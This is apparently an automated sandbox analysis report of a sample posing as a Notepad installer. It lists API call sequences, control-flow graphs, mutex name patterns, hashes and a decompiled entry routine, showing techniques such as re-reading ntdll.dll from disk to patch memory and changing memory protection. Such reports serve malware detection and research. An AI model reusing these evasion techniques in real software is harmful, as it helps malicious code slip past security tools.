12998->12999 12999->12996 13001 408159 VirtualProtect 12999->13001 13000 4081a9 13000->12788 13001->12788 13002 408370 13007 408060 3 API calls 13002->13007 13003->13000 13003->13002 13004 4081f6 13003->13004 13005 408320 13003->13005 13004->13002 13010 408202 13004->13010 13006 4080b0 3 API calls 13005->13006 13009 40825f 13005->13009 13006->13005 13008 40838a 13007->13008 13009->12788 13010->13009 13011 408060 3 API calls 13010->13011 13012 4080b0 VirtualQuery VirtualProtect VirtualProtect 13010->13012 13011->13010 13012->13010 13014 4080e0 13013->13014 13015 408184 13013->13015 13016 4080ee 13014->13016 13018 408110 VirtualProtect 13014->13018 13017 408060 6 API calls 13015->13017 13016->12780 13019 40819c 13017->13019 13020 40813f 13018->13020 13021 4081a9 13019->13021 13023 408370 13019->13023 13024 4081f6 13019->13024 13025 408320 13019->13025 13020->13016 13022 408159 VirtualProtect 13020->13022 13021->12780 13022->12780 13027 408060 6 API calls 13023->13027 13024->13023 13030 408202 13024->13030 13026 4080b0 6 API calls 13025->13026 13029 40825f 13025->13029 13026->13025 13028 40838a 13027->13028 13029->12780 13030->13029 13031 408060 6 API calls 13030->13031 13032 4080b0 6 API calls 13030->13032 13031->13030 13032->13030 13034 402b92 HeapAlloc 13033->13034 13035 402de9 13033->13035 13036 402bc1 HeapAlloc 13034->13036 13037 402dd2 HeapDestroy 13034->13037 13035->12798 13038 402be6 CreateEventW 13036->13038 13039 402daf HeapFree 13036->13039 13037->13035 13050 401ce8 GetTickCount 13038->13050 13039->13037 13042 402d65 13044 402d72 HeapFree 13042->13044 13043 401ce8 GetTickCount 13049 402c26 13043->13049 13044->13039 13045 402d94 13044->13045 13045->13039 13046 408660 free 13045->13046 13046->13045 13047 402ce0 WaitForSingleObject 13047->13049 13049->13042 13049->13043 13049->13044 13049->13047 13052 40204d 13049->13052 13051 401cfa 13050->13051 13051->13049 13053 40206e 13052->13053 13054 40205d 13052->13054 13053->13049 13054->13054 13055 401ce8 GetTickCount 13054->13055 13055->13053 13563 409bb0 FindFirstFileA 13564 409c48 GetLastError _errno 13563->13564 13569 409bd4 13563->13569 13565 409c5b _errno 13564->13565 13566 409c7f _errno 13564->13566 13567 409c68 _errno 13565->13567 13568 409c8c _errno 13565->13568 13566->13569 13567->13569 13570 409c72 _errno 13567->13570 13568->13569 13570->13569

                                      Executed Functions

                                      Function 006E4444 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 226synchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • _snwprintf.NTDLL ref: 006E44EA
                                      • OpenMutexW.KERNEL32(00100000,00000000,?), ref: 006E4503
                                      • _snwprintf.NTDLL ref: 006E455B
                                      • OpenMutexW.KERNEL32(00100000,00000000,?), ref: 006E456E
                                      • GetCurrentProcessId.KERNEL32(?), ref: 006E4581
                                      • ProcessIdToSessionId.KERNEL32(00000000), ref: 006E4588
                                      • _snwprintf.NTDLL ref: 006E45EB
                                      • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 006E45F6
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 006E4602
                                      • CreateMutexW.KERNEL32(0000000C,00000000,?), ref: 006E4615
                                      • GetLastError.KERNEL32 ref: 006E461E
                                      • CloseHandle.KERNEL32(00000000), ref: 006E46C1
                                      Strings
                                      • Global\MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 006E44E3, 006E45E4
                                      • Session\%u\MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 006E4554
                                      • MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 006E467B
                                      • NJI@, xrefs: 006E4461
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Mutex_snwprintf$DescriptorOpenProcessSecurity$CloseCreateCurrentDaclErrorHandleInitializeLastSession
                                      • String ID: Global\MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}$MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}$NJI@$Session\%u\MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                      • API String ID: 2300182234-919140787
                                      • Opcode ID: b56a8a8d1f7894eb2d3231aa741881c1a304bfd2b8fb49c2fd19e78a7212b1c3
                                      • Instruction ID: 8a6dc9c4ba7f90e03af957a0dd978d4bbc4cade63073375babc1fbc40ac2d284
                                      • Opcode Fuzzy Hash: b56a8a8d1f7894eb2d3231aa741881c1a304bfd2b8fb49c2fd19e78a7212b1c3
                                      • Instruction Fuzzy Hash: 5A81C7B69042A9BECB61DBE58C55FFEBBBDAB0D701F040092F694E1091D6789740DB70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004029FB Relevance: 26.3, APIs: 5, Strings: 10, Instructions: 94memorystringnativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 596 4029fb-402a0b 597 402a11-402a6a GetModuleHandleW 596->597 598 402afe-402b05 596->598 597->598 599 402a70-402a78 597->599 600 402ad8-402af7 GetProcessHeap HeapFree 599->600 601 402a7a-402a7e 599->601 600->598 601->600 602 402a80-402a93 601->602 602->600 603 402a95-402aa0 602->603 604 402aa2-402ac9 strlen call 402446 603->604 607 402b06-402b59 NtProtectVirtualMemory 604->607 608 402acb-402ad2 604->608 607->598 608->604 609 402ad4 608->609 609->600
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: Heap$FreeHandleMemoryModuleProcessProtectVirtualstrlen
                                      • String ID: .$@$d$d$l$l$l$l$n$t
                                      • API String ID: 3869171654-4123253677
                                      • Opcode ID: 8c009e6429bca5f5803fb05feb04b0d6cf5275234e336179305ebe6cb715b210
                                      • Instruction ID: dc535bb9188bb5a5f3e5ee450a280e095102bcd1a390071168b7849c924222b8
                                      • Opcode Fuzzy Hash: 8c009e6429bca5f5803fb05feb04b0d6cf5275234e336179305ebe6cb715b210
                                      • Instruction Fuzzy Hash: AA4116715083048FC760EF15C18465ABBF0FF84318F44892EE998973A1E7B9D949CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004076F0 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 307stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 610 4076f0-407703 611 407705 610->611 612 407718-407775 GetCommandLineA strlen call 408390 610->612 613 40770a-407711 611->613 614 407705 call 401290 611->614 617 40777b-407797 612->617 618 40785f-407884 __p__pgmptr 612->618 614->613 619 407798-40779b 617->619 618->613 620 40788a-4078b3 GetModuleFileNameA 618->620 621 4077a1-4077a4 619->621 622 407a88-407a8b 619->622 620->613 623 4078b9-4078ca __p__pgmptr _strdup 620->623 624 407990-407996 621->624 625 4077aa-4077af 621->625 622->625 626 407a91-407a97 622->626 623->613 624->625 630 40799c-40799f 624->630 627 407b25 625->627 628 4077b5 625->628 626->625 629 407a9d-407aa0 626->629 643 407b2c 627->643 631 4077b8-4077c1 628->631 629->625 632 407d70-407d80 629->632 633 4079a6 629->633 634 407aa7-407aae 629->634 635 407ab8-407ac2 629->635 630->625 630->632 630->633 630->634 630->635 636 4079f0-4079f7 630->636 637 407a44-407a48 630->637 631->631 646 4077c3-4077cb 631->646 644 407d82 632->644 645 407d8c-407d8f 632->645 641 4079a9-4079c0 633->641 638 407b00-407b06 634->638 639 407ab0-407ab3 634->639 640 407ac8-407acf 635->640 635->641 636->625 642 4079fd-407a01 636->642 647 407b33-407b35 637->647 648 407a4e 637->648 650 4078ff-407914 638->650 639->650 649 4079c6-4079ca 640->649 651 407ad5-407ad7 640->651 641->643 641->649 652 407a07-407a09 642->652 653 407b3a 642->653 643->647 644->645 654 407d91-407d94 645->654 655 407da8-407db9 645->655 657 4077d1-4077d9 646->657 658 4078f8-4078fd 646->658 656 407a5b-407a62 647->656 659 407a50-407a59 648->659 660 4079d0-4079d9 649->660 650->619 667 40791a-40791c 650->667 661 4079e5-4079eb 651->661 662 407a10-407a19 652->662 653->632 663 407d96-407da0 654->663 664 407de8-407e0e call 407fa0 654->664 655->663 668 407dbb-407dbd 655->668 669 407ae0-407af2 656->669 670 407a64-407a67 656->670 665 4078d0-4078e2 _isctype 657->665 666 4077df-4077ea 657->666 658->650 659->656 659->659 660->660 673 4079db-4079df 660->673 661->658 662->662 674 407a1b-407a22 662->674 676 4077f0-4077f6 665->676 677 4078e8-4078eb 665->677 666->676 666->677 678 407922-407924 667->678 679 40781d-40781f 667->679 671 407dc0-407dc9 668->671 669->650 670->669 672 407a69-407a7e 670->672 680 407dcb 671->680 681 407dcd-407dd2 671->681 672->650 673->658 673->661 682 407a24-407a27 674->682 683 407a2d-407a3f 674->683 687 407940-407984 call 409630 676->687 688 4077fc-407804 676->688 677->676 686 4078f1 677->686 689 407928-407931 678->689 685 407820-407826 679->685 680->681 681->671 691 407dd4-407dde 681->691 682->683 694 407b0b-407b20 682->694 683->650 692 407832-40785a call 409630 685->692 693 407828-407830 685->693 686->658 687->650 688->687 695 40780a-407818 688->695 689->689 696 407933 689->696 692->618 693->618 693->692 694->650 695->650 695->685 696->685
                                      APIs
                                      • GetCommandLineA.KERNEL32 ref: 00407718
                                      • strlen.MSVCRT ref: 00407728
                                      • __p__pgmptr.MSVCRT ref: 0040787B
                                        • Part of subcall function 00401290: __getmainargs.MSVCRT ref: 004012C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: CommandLine__getmainargs__p__pgmptrstrlen
                                      • String ID: !$'$?$@$Z
                                      • API String ID: 3494280972-2658495842
                                      • Opcode ID: ea87d48da4ad286b4472607b9024f34d9ebd5fc97a738b2df8af4cdc5382a03f
                                      • Instruction ID: 48b51223d96d600507549aaa95ac442aa908dc6802bf7441eca1741a7d545c84
                                      • Opcode Fuzzy Hash: ea87d48da4ad286b4472607b9024f34d9ebd5fc97a738b2df8af4cdc5382a03f
                                      • Instruction Fuzzy Hash: D9C1B271E083158BDB24DF28C88439AB7E1AF85304F4484BED949A7381D739BA85CF5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E86CB Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 198COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 781 6e86cb-6e86f9 GetCurrentProcess call 6e8d61 call 6e8da7 786 6e86ff-6e8722 GetModuleHandleA call 6e88f5 781->786 787 6e88f0-6e88f4 781->787 786->787 790 6e8728-6e873e call 6e8ad7 786->790 793 6e87ba-6e87c2 790->793 794 6e8740-6e874f 790->794 795 6e88ad-6e88b2 793->795 796 6e87c8-6e87cc 793->796 794->793 797 6e8751-6e8756 794->797 795->787 798 6e88b4-6e88c8 GetPEB 795->798 796->787 799 6e87d2-6e87dd 796->799 800 6e875d-6e8761 797->800 801 6e8758-6e875b 797->801 798->787 802 6e88ca-6e88cd 798->802 799->795 803 6e87e3-6e87fe GetCurrentProcess 799->803 805 6e87a2-6e87b7 memcpy 800->805 806 6e8763-6e8766 800->806 801->800 804 6e8768-6e8777 call 6e0517 801->804 807 6e88d0-6e88d2 802->807 803->795 808 6e8804 803->808 816 6e8779-6e877c 804->816 817 6e8795-6e879e 804->817 805->793 806->804 806->805 807->787 810 6e88d4-6e88d6 807->810 811 6e8807-6e8823 call 6e8ebf 808->811 813 6e88d8-6e88de call 6e8f22 810->813 814 6e88e5-6e88ee 810->814 823 6e889a-6e88a7 811->823 824 6e8825-6e8831 IsBadHugeReadPtr 811->824 822 6e88e3-6e88e4 813->822 814->807 816->817 821 6e877e-6e8787 816->821 817->797 818 6e87a0 817->818 818->793 821->793 825 6e8789-6e8790 821->825 822->814 823->795 823->811 824->823 826 6e8833-6e883f IsBadHugeReadPtr 824->826 825->793 827 6e8792 825->827 826->823 828 6e8841-6e8850 memcmp 826->828 827->817 828->823 829 6e8852-6e8874 call 6e0300 828->829 829->823 832 6e8876-6e8895 memcpy call 6e0300 829->832 832->823
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 006E86D9
                                        • Part of subcall function 006E8D61: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006E86E5,00000000), ref: 006E8D77
                                        • Part of subcall function 006E8D61: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E8D83
                                        • Part of subcall function 006E8DA7: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 006E8DC6
                                        • Part of subcall function 006E8DA7: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E8DE7
                                        • Part of subcall function 006E8DA7: GetFileSize.KERNEL32(00000000,00000000), ref: 006E8DFE
                                        • Part of subcall function 006E8DA7: malloc.MSVCRT ref: 006E8E08
                                        • Part of subcall function 006E8DA7: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 006E8E23
                                        • Part of subcall function 006E8DA7: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006E8E57
                                        • Part of subcall function 006E8DA7: memcpy.NTDLL(00000000,00000000,00000000), ref: 006E8E69
                                        • Part of subcall function 006E8DA7: memcpy.NTDLL(?,?,?), ref: 006E8E8F
                                        • Part of subcall function 006E8DA7: ??3@YAXPAX@Z.MSVCRT ref: 006E8EA7
                                        • Part of subcall function 006E8DA7: FindCloseChangeNotification.KERNELBASE(00000000), ref: 006E8EB1
                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 006E8704
                                      • memcpy.NTDLL(Function_00000300,00000000,?), ref: 006E87B2
                                      • GetCurrentProcess.KERNEL32 ref: 006E87E3
                                      • IsBadHugeReadPtr.KERNEL32(00000000,?), ref: 006E8829
                                      • IsBadHugeReadPtr.KERNEL32(?,?), ref: 006E8837
                                      • memcmp.NTDLL ref: 006E8846
                                      • memcpy.NTDLL(?,00000000,?,?,?,00001000,00000040,?), ref: 006E887B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy$FileRead$CurrentHandleHugeModuleProcess$??3@AddressAllocChangeCloseCreateEnvironmentExpandFindNotificationProcSizeStringsVirtualmallocmemcmp
                                      • String ID: %Systemroot%\system32\ntdll.dll$ZwProtectVirtualMemory$ntdll.dll
                                      • API String ID: 1594796074-4023328602
                                      • Opcode ID: 41a432c0b3cb950c789aa3dbd7e142e7d614742475ef3fe9414d3eaf4f0bb0d9
                                      • Instruction ID: 4859297827db80d689de082dc9f639f91e6e4c9a7dfbbca8608a5f7095a4d51a
                                      • Opcode Fuzzy Hash: 41a432c0b3cb950c789aa3dbd7e142e7d614742475ef3fe9414d3eaf4f0bb0d9
                                      • Instruction Fuzzy Hash: 5C618D71D02389AFDF219F96C884AEEB7BBEF44314F644069E909A3241DB359D41CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F0927 Relevance: 16.6, APIs: 11, Instructions: 122networkregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 869 6f0927-6f0952 memset 870 6f0976-6f097e 869->870 871 6f0954-6f0974 869->871 872 6f0985-6f0996 memset 870->872 871->872 873 6f0998-6f099d 872->873 874 6f09a0-6f09c0 WSARecv 872->874 873->874 876 6f09e2-6f09ed GetLastError 874->876 877 6f09c2-6f09ca 874->877 879 6f0a23-6f0a32 876->879 880 6f09ef-6f09f7 WSAGetLastError 876->880 878 6f09cc-6f09dd 877->878 877->879 881 6f0a73-6f0a7d call 6f2144 878->881 884 6f0a7e-6f0a82 879->884 885 6f0a34-6f0a3b 879->885 882 6f09f9-6f09ff WSAGetLastError 880->882 883 6f0a01-6f0a0c WSAGetLastError 880->883 881->884 887 6f0a11-6f0a21 call 6f2144 882->887 883->887 885->884 888 6f0a3d-6f0a53 RegisterWaitForSingleObject 885->888 887->884 888->884 889 6f0a55-6f0a5f GetLastError 888->889 892 6f0a65-6f0a6c GetLastError 889->892 893 6f0a61-6f0a63 GetLastError 889->893 895 6f0a71 892->895 893->895 895->881
                                      APIs
                                      • memset.NTDLL ref: 006F093E
                                      • memset.NTDLL ref: 006F098A
                                      • WSARecv.WS2_32(?,00000000,00000001,?,00000000,00000044,00000000), ref: 006F09B8
                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 006F09E2
                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 006F09EF
                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 006F09F9
                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 006F0A01
                                      • RegisterWaitForSingleObject.KERNEL32(00000064,?,006F0870,00000034,000000FF,00000004), ref: 006F0A4B
                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 006F0A5B
                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 006F0A61
                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 006F0A65
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$memset$ObjectRecvRegisterSingleWait
                                      • String ID:
                                      • API String ID: 2020750497-0
                                      • Opcode ID: 8806394e5b00fcfce100f8ab7a2287f92dfbe9785bf82ea21d07b266e2341286
                                      • Instruction ID: 7fbe5dd8cf46fa38ff7ee723c24e78e934015a9762b4bfe67890407da14cf7df
                                      • Opcode Fuzzy Hash: 8806394e5b00fcfce100f8ab7a2287f92dfbe9785bf82ea21d07b266e2341286
                                      • Instruction Fuzzy Hash: 7E418D31500B0AAFE721DF64CC45BBABBFAFF04314F104629EA91D65A2D374E905CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004011A0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 60%
                                      			E004011A0() {
				intOrPtr _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr* _t11;
				intOrPtr _t14;
				int _t17;
				intOrPtr* _t23;
				intOrPtr _t28;
				void* _t30;
				int _t31;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;
				signed int _t35;

				_t34 =  &_v24;
				_t11 =  *0x425324; // 0x407d70
				if(_t11 != 0) {
					_v20 = 0;
					_v24 = 2;
					 *_t34 = 0;
					 *_t11();
					_t34 = _t34 - 0xc;
				}
				 *_t34 = E00401000; // executed
				SetUnhandledExceptionFilter(??); // executed
				_t35 = _t34 - 4;
				E00407B50(_t30);
				_t14 =  *0x424fc4; // 0xfffffffd
				 *_t35 = _t14;
				E004084B0(); // executed
				E004076F0(_t32); // executed
				_t17 =  *0x427008;
				if(_t17 != 0) {
					L4:
					_t28 = __imp___iob; // 0x74894600
					_v16 = _t17;
					 *0x424fc8 = _t17;
					_v20 =  *((intOrPtr*)(_t28 + 0x10));
					L0040A368();
					_v16 =  *0x427008;
					_v20 =  *((intOrPtr*)(_t28 + 0x30));
					L0040A368();
					_v16 =  *0x427008;
					_t17 =  *(_t28 + 0x50);
					_v20 = _t17;
					L0040A368();
					goto L3;
				} else {
					L3:
					L0040A3A8();
					_t31 =  *0x424fc8; // 0x4000
					 *_t17 = _t31;
					E004081A0(_t28, _t32, _t33);
					_t35 = _t35 & 0xfffffff0;
					_t23 = E00407D00();
					L0040A3B0();
					_v12 =  *_t23;
					_v16 =  *0x427000;
					_v20 =  *0x427004; // executed
					_t17 = E00402E0B(); // executed
					L0040A390();
					ExitProcess(_t17);
					goto L4;
				}
			}


















                                      0x004011a1
                                      0x004011a4
                                      0x004011ab
                                      0x004011ad
                                      0x004011b5
                                      0x004011bd
                                      0x004011c4
                                      0x004011c6
                                      0x004011c6
                                      0x004011c9
                                      0x004011d0
                                      0x004011d5
                                      0x004011d8
                                      0x004011dd
                                      0x004011e2
                                      0x004011e5
                                      0x004011ea
                                      0x004011ef
                                      0x004011f6
                                      0x00401242
                                      0x00401242
                                      0x00401248
                                      0x0040124c
                                      0x00401254
                                      0x00401257
                                      0x00401261
                                      0x00401268
                                      0x0040126b
                                      0x00401275
                                      0x00401279
                                      0x0040127c
                                      0x0040127f
                                      0x00000000
                                      0x004011f8
                                      0x004011f8
                                      0x004011f8
                                      0x004011fd
                                      0x00401203
                                      0x00401205
                                      0x0040120a
                                      0x0040120d
                                      0x00401212
                                      0x00401219
                                      0x00401222
                                      0x0040122b
                                      0x0040122e
                                      0x00401235
                                      0x0040123d
                                      0x00000000
                                      0x0040123d

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _setmode$ExceptionExitFilterProcessUnhandled__p__environ__p__fmode_cexit
                                      • String ID: p}@
                                      • API String ID: 3476844589-1207826281
                                      • Opcode ID: a45e277e0ddd29b82a1313aa6a6827d61585393c4881971a0e39252b5f68e253
                                      • Instruction ID: 330f25d58611b2836ae3ca3aaec3816092505130626428a98ad199a3f004d377
                                      • Opcode Fuzzy Hash: a45e277e0ddd29b82a1313aa6a6827d61585393c4881971a0e39252b5f68e253
                                      • Instruction Fuzzy Hash: A621C9B46087008FC710FF79D58661D77E0BF48718F41493EE884AB392DA3898558B5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E93CE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 88nativestringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 992 6e93ce-6e93e6 993 6e93ec-6e93f2 992->993 994 6e94b3-6e94b5 992->994 993->994 995 6e93f8-6e943e lstrlenW NtOpenDirectoryObject 993->995 995->994 996 6e9440-6e9455 calloc * 2 995->996 997 6e9456-6e946f NtQueryDirectoryObject 996->997 998 6e94a9-6e94b2 ??3@YAXPAX@Z 997->998 999 6e9471-6e9474 997->999 998->994 999->998 1000 6e9476-6e9498 calloc memcpy 999->1000 1000->997 1001 6e949a-6e94a7 1000->1001 1001->997 1001->998
                                      APIs
                                      • lstrlenW.KERNEL32(?,00000000,?,?,?,?,?,006EC8CA,\GLOBAL??,006EC8D7,00000000), ref: 006E93FF
                                      • NtOpenDirectoryObject.NTDLL(?,00000001,00000018), ref: 006E9436
                                      • calloc.MSVCRT ref: 006E9450
                                      • NtQueryDirectoryObject.NTDLL(?,00000000,00000800,00000001,00000000,00000000,00000000), ref: 006E9467
                                      • calloc.MSVCRT ref: 006E947D
                                      • memcpy.NTDLL(00000000,?), ref: 006E948C
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E94AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DirectoryObjectcalloc$??3@OpenQuerylstrlenmemcpy
                                      • String ID: @
                                      • API String ID: 3201054100-2766056989
                                      • Opcode ID: e95a97761319b7f9ffed67a0b4a0ef29a9980e68666d35634b0ad03ff066f1f5
                                      • Instruction ID: 8ab68101f57a8c0c6ed165db35b54d54b223935be00cebb6f1f7145f0bc095ef
                                      • Opcode Fuzzy Hash: e95a97761319b7f9ffed67a0b4a0ef29a9980e68666d35634b0ad03ff066f1f5
                                      • Instruction Fuzzy Hash: D2312CB5C01219EBDB119FAADC44AEEBBF9FF08711F10811AF514E2290E7748A41CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409BB0 Relevance: 12.1, APIs: 8, Instructions: 68fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _errno$ErrorFileFindFirstLast
                                      • String ID:
                                      • API String ID: 2068755524-0
                                      • Opcode ID: 3369b53b6a83d211fb5db5ad59101cbdb64616664d88732dffadc5f787f90dbd
                                      • Instruction ID: 10495f1505d1f9a887e1aaac460795732aae97bab1225411faa4919bf34875ea
                                      • Opcode Fuzzy Hash: 3369b53b6a83d211fb5db5ad59101cbdb64616664d88732dffadc5f787f90dbd
                                      • Instruction Fuzzy Hash: E621C9705083508AEB11AF75988126AB7E0AF42318F48847BEC54AF3D3D23C8C45D77B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F0442 Relevance: 10.6, APIs: 7, Instructions: 64networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WS2_32(00000010,00000001,00000000), ref: 006F0457
                                      • WSAGetLastError.WS2_32(?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010,006F16C7,006F1744), ref: 006F0464
                                        • Part of subcall function 006F04ED: ioctlsocket.WS2_32(006F16C7,8004667E,006F1744), ref: 006F0508
